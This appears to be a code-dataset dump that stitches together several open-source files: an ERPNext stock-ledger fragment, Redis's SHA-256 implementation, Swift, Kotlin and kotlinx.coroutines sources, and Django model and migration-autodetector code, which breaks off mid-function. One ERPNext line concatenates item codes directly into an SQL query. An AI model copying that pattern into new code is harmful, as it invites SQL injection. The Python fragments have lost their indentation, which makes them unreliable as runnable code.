item_list = [d.item_code for d in self.doclist.get({"parentfield": self.fname})]
condition = ''.join(['and item_code in (\'', '\', \''.join(item_list) ,'\')'])
else:
condition = ""
for d in webnotes.conn.sql("""select distinct sle.voucher_type, sle.voucher_no
from `tabStock Ledger Entry` sle
where timestamp(sle.posting_date, sle.posting_time) >= timestamp(%s, %s) %s
order by timestamp(sle.posting_date, sle.posting_time) asc, name asc""" %
('%s', '%s', condition), (self.doc.posting_date, self.doc.posting_time),
as_dict=True):
future_stock_vouchers.append([d.voucher_type, d.voucher_no])
return future_stock_vouchers
def get_voucherwise_gl_entries(self, future_stock_vouchers):
gl_entries = {}
if future_stock_vouchers:
for d in webnotes.conn.sql("""select * from `tabGL Entry`
where posting_date >= %s and voucher_no in (%s)""" %
('%s', ', '.join(['%s']*len(future_stock_vouchers))),
tuple([self.doc.posting_date] + [d[1] for d in future_stock_vouchers]), as_dict=1):
gl_entries.setdefault((d.voucher_type, d.voucher_no), []).append(d)
return gl_entries
def delete_gl_entries(self, voucher_type, voucher_no):
webnotes.conn.sql("""delete from `tabGL Entry`
where voucher_type=%s and voucher_no=%s""", (voucher_type, voucher_no))
def make_adjustment_entry(self, expected_gle, voucher_obj):
from accounts.utils import get_stock_and_account_difference
account_list = [d.account for d in expected_gle]
acc_diff = get_stock_and_account_difference(account_list, expected_gle[0].posting_date)
cost_center = self.get_company_default("cost_center")
stock_adjustment_account = self.get_company_default("stock_adjustment_account")
gl_entries = []
for account, diff in acc_diff.items():
if diff:
gl_entries.append([
# stock in hand account
voucher_obj.get_gl_dict({
"account": account,
"against": stock_adjustment_account,
"debit": diff,
"remarks": "Adjustment Accounting Entry for Stock",
}),
# account against stock in hand
voucher_obj.get_gl_dict({
"account": stock_adjustment_account,
"against": account,
"credit": diff,
"cost_center": cost_center or None,
"remarks": "Adjustment Accounting Entry for Stock",
}),
])
if gl_entries:
from accounts.general_ledger import make_gl_entries
make_gl_entries(gl_entries)
def check_expense_account(self, item):
if item.fields.has_key("expense_account") and not item.expense_account:
msgprint(_("""Expense/Difference account is mandatory for item: """) + item.item_code,
raise_exception=1)
if item.fields.has_key("expense_account") and not item.cost_center:
msgprint(_("""Cost Center is mandatory for item: """) + item.item_code,
raise_exception=1)
def get_sl_entries(self, d, args):
sl_dict = {
"item_code": d.item_code,
"warehouse": d.warehouse,
"posting_date": self.doc.posting_date,
"posting_time": self.doc.posting_time,
"voucher_type": self.doc.doctype,
"voucher_no": self.doc.name,
"voucher_detail_no": d.name,
"actual_qty": (self.doc.docstatus==1 and 1 or -1)*flt(d.stock_qty),
"stock_uom": d.stock_uom,
"incoming_rate": 0,
"company": self.doc.company,
"fiscal_year": self.doc.fiscal_year,
"batch_no": cstr(d.batch_no).strip(),
"serial_no": d.serial_no,
"project": d.project_name,
"is_cancelled": self.doc.docstatus==2 and "Yes" or "No"
}
sl_dict.update(args)
return sl_dict
def make_sl_entries(self, sl_entries, is_amended=None):
from stock.stock_ledger import make_sl_entries
make_sl_entries(sl_entries, is_amended)
def get_stock_ledger_entries(self, item_list=None, warehouse_list=None):
out = {}
if not (item_list and warehouse_list):
item_list, warehouse_list = self.get_distinct_item_warehouse()
if item_list and warehouse_list:
res = webnotes.conn.sql("""select item_code, voucher_type, voucher_no,
voucher_detail_no, posting_date, posting_time, stock_value,
warehouse, actual_qty as qty from `tabStock Ledger Entry`
where company = %s and item_code in (%s) and warehouse in (%s)
order by item_code desc, warehouse desc, posting_date desc,
posting_time desc, name desc""" %
('%s', ', '.join(['%s']*len(item_list)), ', '.join(['%s']*len(warehouse_list))),
tuple([self.doc.company] + item_list + warehouse_list), as_dict=1)
for r in res:
if (r.item_code, r.warehouse) not in out:
out[(r.item_code, r.warehouse)] = []
out[(r.item_code, r.warehouse)].append(r)
return out
def get_distinct_item_warehouse(self):
item_list = []
warehouse_list = []
for item in self.doclist.get({"parentfield": self.fname}) \
+ self.doclist.get({"parentfield": "packing_details"}):
item_list.append(item.item_code)
warehouse_list.append(item.warehouse)
return list(set(item_list)), list(set(warehouse_list))
def make_cancel_gl_entries(self):
if webnotes.conn.sql("""select name from `tabGL Entry` where voucher_type=%s
and voucher_no=%s""", (self.doc.doctype, self.doc.name)):
self.make_gl_entries() | unknown | codeparrot/codeparrot-clean | ||
/*********************************************************************
* Filename: sha256.c
* Author: Brad Conte (brad AT bradconte.com)
* Copyright:
* Disclaimer: This code is presented "as is" without any guarantees.
* Details: Implementation of the SHA-256 hashing algorithm.
SHA-256 is one of the three algorithms in the SHA2
specification. The others, SHA-384 and SHA-512, are not
offered in this implementation.
Algorithm specification can be found here:
* http://csrc.nist.gov/publications/fips/fips180-2/fips180-2withchangenotice.pdf
This implementation uses little endian byte order.
*********************************************************************/
/*************************** HEADER FILES ***************************/
#include <stdlib.h>
#include <string.h>
#include "sha256.h"
/****************************** MACROS ******************************/
#define ROTLEFT(a,b) (((a) << (b)) | ((a) >> (32-(b))))
#define ROTRIGHT(a,b) (((a) >> (b)) | ((a) << (32-(b))))
#define CH(x,y,z) (((x) & (y)) ^ (~(x) & (z)))
#define MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z)))
#define EP0(x) (ROTRIGHT(x,2) ^ ROTRIGHT(x,13) ^ ROTRIGHT(x,22))
#define EP1(x) (ROTRIGHT(x,6) ^ ROTRIGHT(x,11) ^ ROTRIGHT(x,25))
#define SIG0(x) (ROTRIGHT(x,7) ^ ROTRIGHT(x,18) ^ ((x) >> 3))
#define SIG1(x) (ROTRIGHT(x,17) ^ ROTRIGHT(x,19) ^ ((x) >> 10))
/**************************** VARIABLES *****************************/
static const WORD k[64] = {
0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5,
0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174,
0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,
0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967,
0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85,
0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070,
0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,
0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
};
/*********************** FUNCTION DEFINITIONS ***********************/
void sha256_transform(SHA256_CTX *ctx, const BYTE data[])
{
WORD a, b, c, d, e, f, g, h, i, j, t1, t2, m[64];
for (i = 0, j = 0; i < 16; ++i, j += 4) {
m[i] = ((WORD) data[j + 0] << 24) |
((WORD) data[j + 1] << 16) |
((WORD) data[j + 2] << 8) |
((WORD) data[j + 3]);
}
for ( ; i < 64; ++i)
m[i] = SIG1(m[i - 2]) + m[i - 7] + SIG0(m[i - 15]) + m[i - 16];
a = ctx->state[0];
b = ctx->state[1];
c = ctx->state[2];
d = ctx->state[3];
e = ctx->state[4];
f = ctx->state[5];
g = ctx->state[6];
h = ctx->state[7];
for (i = 0; i < 64; ++i) {
t1 = h + EP1(e) + CH(e,f,g) + k[i] + m[i];
t2 = EP0(a) + MAJ(a,b,c);
h = g;
g = f;
f = e;
e = d + t1;
d = c;
c = b;
b = a;
a = t1 + t2;
}
ctx->state[0] += a;
ctx->state[1] += b;
ctx->state[2] += c;
ctx->state[3] += d;
ctx->state[4] += e;
ctx->state[5] += f;
ctx->state[6] += g;
ctx->state[7] += h;
}
void sha256_init(SHA256_CTX *ctx)
{
ctx->datalen = 0;
ctx->bitlen = 0;
ctx->state[0] = 0x6a09e667;
ctx->state[1] = 0xbb67ae85;
ctx->state[2] = 0x3c6ef372;
ctx->state[3] = 0xa54ff53a;
ctx->state[4] = 0x510e527f;
ctx->state[5] = 0x9b05688c;
ctx->state[6] = 0x1f83d9ab;
ctx->state[7] = 0x5be0cd19;
}
void sha256_update(SHA256_CTX *ctx, const BYTE data[], size_t len)
{
WORD i;
for (i = 0; i < len; ++i) {
ctx->data[ctx->datalen] = data[i];
ctx->datalen++;
if (ctx->datalen == 64) {
sha256_transform(ctx, ctx->data);
ctx->bitlen += 512;
ctx->datalen = 0;
}
}
}
void sha256_final(SHA256_CTX *ctx, BYTE hash[])
{
WORD i;
i = ctx->datalen;
// Pad whatever data is left in the buffer.
if (ctx->datalen < 56) {
ctx->data[i++] = 0x80;
while (i < 56)
ctx->data[i++] = 0x00;
}
else {
ctx->data[i++] = 0x80;
while (i < 64)
ctx->data[i++] = 0x00;
sha256_transform(ctx, ctx->data);
memset(ctx->data, 0, 56);
}
// Append to the padding the total message's length in bits and transform.
ctx->bitlen += ctx->datalen * 8;
ctx->data[63] = ctx->bitlen;
ctx->data[62] = ctx->bitlen >> 8;
ctx->data[61] = ctx->bitlen >> 16;
ctx->data[60] = ctx->bitlen >> 24;
ctx->data[59] = ctx->bitlen >> 32;
ctx->data[58] = ctx->bitlen >> 40;
ctx->data[57] = ctx->bitlen >> 48;
ctx->data[56] = ctx->bitlen >> 56;
sha256_transform(ctx, ctx->data);
// Since this implementation uses little endian byte ordering and SHA uses big endian,
// reverse all the bytes when copying the final state to the output hash.
for (i = 0; i < 4; ++i) {
hash[i] = (ctx->state[0] >> (24 - i * 8)) & 0x000000ff;
hash[i + 4] = (ctx->state[1] >> (24 - i * 8)) & 0x000000ff;
hash[i + 8] = (ctx->state[2] >> (24 - i * 8)) & 0x000000ff;
hash[i + 12] = (ctx->state[3] >> (24 - i * 8)) & 0x000000ff;
hash[i + 16] = (ctx->state[4] >> (24 - i * 8)) & 0x000000ff;
hash[i + 20] = (ctx->state[5] >> (24 - i * 8)) & 0x000000ff;
hash[i + 24] = (ctx->state[6] >> (24 - i * 8)) & 0x000000ff;
hash[i + 28] = (ctx->state[7] >> (24 - i * 8)) & 0x000000ff;
}
} | c | github | https://github.com/redis/redis | src/sha256.c |
//===--- ThreadSafeRefCounted.h - Thread-safe Refcounting Base --*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_BASIC_THREADSAFEREFCOUNTED_H
#define SWIFT_BASIC_THREADSAFEREFCOUNTED_H
#include <atomic>
#include <cassert>
#include "llvm/ADT/IntrusiveRefCntPtr.h"
namespace swift {
/// A class that has the same function as \c ThreadSafeRefCountedBase, but with
/// a virtual destructor.
///
/// Should be used instead of \c ThreadSafeRefCountedBase for classes that
/// already have virtual methods to enforce dynamic allocation via 'new'.
/// FIXME: This should eventually move to llvm.
class ThreadSafeRefCountedBaseVPTR {
mutable std::atomic<unsigned> ref_cnt;
virtual void anchor();
protected:
ThreadSafeRefCountedBaseVPTR() : ref_cnt(0) {}
virtual ~ThreadSafeRefCountedBaseVPTR() {}
public:
void Retain() const {
ref_cnt += 1;
}
void Release() const {
int refCount = static_cast<int>(--ref_cnt);
assert(refCount >= 0 && "Reference count was already zero.");
if (refCount == 0) delete this;
}
};
} // end namespace swift
#endif // SWIFT_BASIC_THREADSAFEREFCOUNTED_H | c | github | https://github.com/apple/swift | include/swift/Basic/ThreadSafeRefCounted.h |
from django.db import models
class Foo(models.Model):
name = models.CharField(max_length=50)
friend = models.CharField(max_length=50, blank=True)
class Bar(models.Model):
name = models.CharField(max_length=50)
normal = models.ForeignKey(Foo, models.CASCADE, related_name="normal_foo")
fwd = models.ForeignKey("Whiz", models.CASCADE)
back = models.ForeignKey("Foo", models.CASCADE)
class Whiz(models.Model):
name = models.CharField(max_length=50)
class Child(models.Model):
parent = models.OneToOneField("Base", models.CASCADE)
name = models.CharField(max_length=50)
class Base(models.Model):
name = models.CharField(max_length=50)
class Article(models.Model):
name = models.CharField(max_length=50)
text = models.TextField()
submitted_from = models.GenericIPAddressField(blank=True, null=True) | python | github | https://github.com/django/django | tests/string_lookup/models.py |
/*
* Copyright 2010-2022 JetBrains s.r.o. and Kotlin Programming Language contributors.
* Use of this source code is governed by the Apache 2.0 license that can be found in the license/LICENSE.txt file.
*/
package org.jetbrains.kotlin.analysis.api.fir.diagnostics
import com.intellij.psi.PsiElement
import org.jetbrains.kotlin.analysis.api.lifetime.KaLifetimeToken
import org.jetbrains.kotlin.diagnostics.*
internal class KaCompilerPluginDiagnostic0Impl(
firDiagnostic: KtPsiSimpleDiagnostic,
token: KaLifetimeToken
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic0
internal class KaCompilerPluginDiagnostic1Impl(
firDiagnostic: KtPsiDiagnosticWithParameters1<*>,
token: KaLifetimeToken,
override val parameter1: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic1
internal class KaCompilerPluginDiagnostic2Impl(
firDiagnostic: KtPsiDiagnosticWithParameters2<*, *>,
token: KaLifetimeToken,
override val parameter1: Any?,
override val parameter2: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic2
internal class KaCompilerPluginDiagnostic3Impl(
firDiagnostic: KtPsiDiagnosticWithParameters3<*, *, *>,
token: KaLifetimeToken,
override val parameter1: Any?,
override val parameter2: Any?,
override val parameter3: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic3
internal class KaCompilerPluginDiagnostic4Impl(
firDiagnostic: KtPsiDiagnosticWithParameters4<*, *, *, *>,
token: KaLifetimeToken,
override val parameter1: Any?,
override val parameter2: Any?,
override val parameter3: Any?,
override val parameter4: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic4 | kotlin | github | https://github.com/JetBrains/kotlin | analysis/analysis-api-fir/src/org/jetbrains/kotlin/analysis/api/fir/diagnostics/KaCompilerPluginDiagnosticImpl.kt |
@file:JvmMultifileClass
@file:JvmName("FlowKt")
@file:Suppress("UNCHECKED_CAST")
package kotlinx.coroutines.flow
import kotlinx.coroutines.*
import kotlinx.coroutines.flow.internal.*
import kotlin.jvm.*
// ------------------ WARNING ------------------
// These emitting operators must use safe flow builder, because they allow
// user code to directly emit to the underlying FlowCollector.
/**
* Applies [transform] function to each value of the given flow.
*
* The receiver of the `transform` is [FlowCollector] and thus `transform` is a
* flexible function that may transform emitted element, skip it or emit it multiple times.
*
* This operator generalizes [filter] and [map] operators and
* can be used as a building block for other operators, for example:
*
* ```
* fun Flow<Int>.skipOddAndDuplicateEven(): Flow<Int> = transform { value ->
* if (value % 2 == 0) { // Emit only even values, but twice
* emit(value)
* emit(value)
* } // Do nothing if odd
* }
* ```
*/
public inline fun <T, R> Flow<T>.transform(
@BuilderInference crossinline transform: suspend FlowCollector<R>.(value: T) -> Unit
): Flow<R> = flow { // Note: safe flow is used here, because collector is exposed to transform on each operation
collect { value ->
// kludge, without it Unit will be returned and TCE won't kick in, KT-28938
return@collect transform(value)
}
}
// For internal operator implementation
@PublishedApi
internal inline fun <T, R> Flow<T>.unsafeTransform(
@BuilderInference crossinline transform: suspend FlowCollector<R>.(value: T) -> Unit
): Flow<R> = unsafeFlow { // Note: unsafe flow is used here, because unsafeTransform is only for internal use
collect { value ->
// kludge, without it Unit will be returned and TCE won't kick in, KT-28938
return@collect transform(value)
}
}
/**
* Returns a flow that invokes the given [action] **before** this flow starts to be collected.
*
* The [action] is called before the upstream flow is started, so if it is used with a [SharedFlow]
* there is **no guarantee** that emissions from the upstream flow that happen inside or immediately
* after this `onStart` action will be collected
* (see [onSubscription] for an alternative operator on shared flows).
*
* The receiver of the [action] is [FlowCollector], so `onStart` can emit additional elements.
* For example:
*
* ```
* flowOf("a", "b", "c")
* .onStart { emit("Begin") }
* .collect { println(it) } // prints Begin, a, b, c
* ```
*/
public fun <T> Flow<T>.onStart(
action: suspend FlowCollector<T>.() -> Unit
): Flow<T> = unsafeFlow { // Note: unsafe flow is used here, but safe collector is used to invoke start action
val safeCollector = SafeCollector<T>(this, currentCoroutineContext())
try {
safeCollector.action()
} finally {
safeCollector.releaseIntercepted()
}
collect(this) // directly delegate
}
/**
* Returns a flow that invokes the given [action] **after** the flow is completed or cancelled, passing
* the cancellation exception or failure as cause parameter of [action].
*
* Conceptually, `onCompletion` is similar to wrapping the flow collection into a `finally` block,
* for example the following imperative snippet:
*
* ```
* try {
* myFlow.collect { value ->
* println(value)
* }
* } finally {
* println("Done")
* }
* ```
*
* can be replaced with a declarative one using `onCompletion`:
*
* ```
* myFlow
* .onEach { println(it) }
* .onCompletion { println("Done") }
* .collect()
* ```
*
* Unlike [catch], this operator reports exception that occur both upstream and downstream
* and observe exceptions that are thrown to cancel the flow. Exception is empty if and only if
* the flow had fully completed successfully. Conceptually, the following code:
*
* ```
* myFlow.collect { value ->
* println(value)
* }
* println("Completed successfully")
* ```
*
* can be replaced with:
*
* ```
* myFlow
* .onEach { println(it) }
* .onCompletion { if (it == null) println("Completed successfully") }
* .collect()
* ```
*
* The receiver of the [action] is [FlowCollector] and this operator can be used to emit additional
* elements at the end **if it completed successfully**. For example:
*
* ```
* flowOf("a", "b", "c")
* .onCompletion { emit("Done") }
* .collect { println(it) } // prints a, b, c, Done
* ```
*
* In case of failure or cancellation, any attempt to emit additional elements throws the corresponding exception.
* Use [catch] if you need to suppress failure and replace it with emission of elements.
*/
public fun <T> Flow<T>.onCompletion(
action: suspend FlowCollector<T>.(cause: Throwable?) -> Unit
): Flow<T> = unsafeFlow { // Note: unsafe flow is used here, but safe collector is used to invoke completion action
try {
collect(this)
} catch (e: Throwable) {
/*
* Use throwing collector to prevent any emissions from the
* completion sequence when downstream has failed, otherwise it may
* lead to a non-sequential behaviour impossible with `finally`
*/
ThrowingCollector(e).invokeSafely(action, e)
throw e
}
// Normal completion
val sc = SafeCollector(this, currentCoroutineContext())
try {
sc.action(null)
} finally {
sc.releaseIntercepted()
}
}
/**
* Invokes the given [action] when this flow completes without emitting any elements.
* The receiver of the [action] is [FlowCollector], so `onEmpty` can emit additional elements.
* For example:
*
* ```
* emptyFlow<Int>().onEmpty {
* emit(1)
* emit(2)
* }.collect { println(it) } // prints 1, 2
* ```
*/
public fun <T> Flow<T>.onEmpty(
action: suspend FlowCollector<T>.() -> Unit
): Flow<T> = unsafeFlow {
var isEmpty = true
collect {
isEmpty = false
emit(it)
}
if (isEmpty) {
val collector = SafeCollector(this, currentCoroutineContext())
try {
collector.action()
} finally {
collector.releaseIntercepted()
}
}
}
/*
* 'emitAll' methods call this to fail-fast before starting to collect
* their sources (that may not have any elements for a long time).
*/
internal fun FlowCollector<*>.ensureActive() {
if (this is ThrowingCollector) throw e
}
internal class ThrowingCollector(@JvmField val e: Throwable) : FlowCollector<Any?> {
override suspend fun emit(value: Any?) {
throw e
}
}
private suspend fun <T> FlowCollector<T>.invokeSafely(
action: suspend FlowCollector<T>.(cause: Throwable?) -> Unit,
cause: Throwable?
) {
try {
action(cause)
} catch (e: Throwable) {
if (cause !== null && cause !== e) e.addSuppressed(cause)
throw e
}
} | kotlin | github | https://github.com/Kotlin/kotlinx.coroutines | kotlinx-coroutines-core/common/src/flow/operators/Emitters.kt |
from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
self.existing_apps = {app for app, model in from_state.models}
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if isinstance(obj, list):
return [self.deep_deconstruct(value) for value in obj]
elif isinstance(obj, tuple):
return tuple(self.deep_deconstruct(value) for value in obj)
elif isinstance(obj, dict):
return {
key: self.deep_deconstruct(value)
for key, value in obj.items()
}
elif isinstance(obj, COMPILED_REGEX_TYPE):
return RegexObject(obj)
elif isinstance(obj, type):
# If this is a type that implements 'deconstruct' as an instance method,
# avoid treating this as being deconstructible itself - see #22951
return obj
elif hasattr(obj, 'deconstruct'):
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
else:
return obj
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in sorted(fields):
deconstruction = self.deep_deconstruct(field)
if field.remote_field and field.remote_field.model:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare lists of fields and generate through model map
self._prepare_field_lists()
self._generate_through_model_map()
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
self._sort_migrations()
self._build_migration_list(graph)
self._optimize_migrations()
return self.migrations
def _prepare_field_lists(self):
"""
Prepare field lists, and prepare a list of the fields that used
through models in the old state so we can make dependencies
from the through model deletion to the field that uses it.
"""
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
def _generate_through_model_map(self):
"""
Through model map generation
"""
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "remote_field") and getattr(old_field.remote_field, "through", None)
and not old_field.remote_field.through._meta.auto_created):
through_key = (
old_field.remote_field.through._meta.app_label,
old_field.remote_field.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
def _build_migration_list(self, graph=None):
"""
We need to chop the lists of operations up into migrations with
dependencies on each other. We do this by stepping up an app's list of
operations until we find one that has an outgoing dependency that isn't
in another app's migration yet (hasn't been chopped off its list). We
then chop off the operations before it into a migration and move onto
the next app. If we loop back around without doing anything, there's a
circular dependency (which _should_ be impossible as the operations are
all split at this point so they can't depend and be depended on).
"""
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
instance.initial = app_label not in self.existing_apps
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
def _sort_migrations(self):
"""
Reorder to make things possible. The order we have already isn't bad,
but we need to pull a few things around so FKs work nicely inside the
same app
"""
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
def _optimize_migrations(self):
# Add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
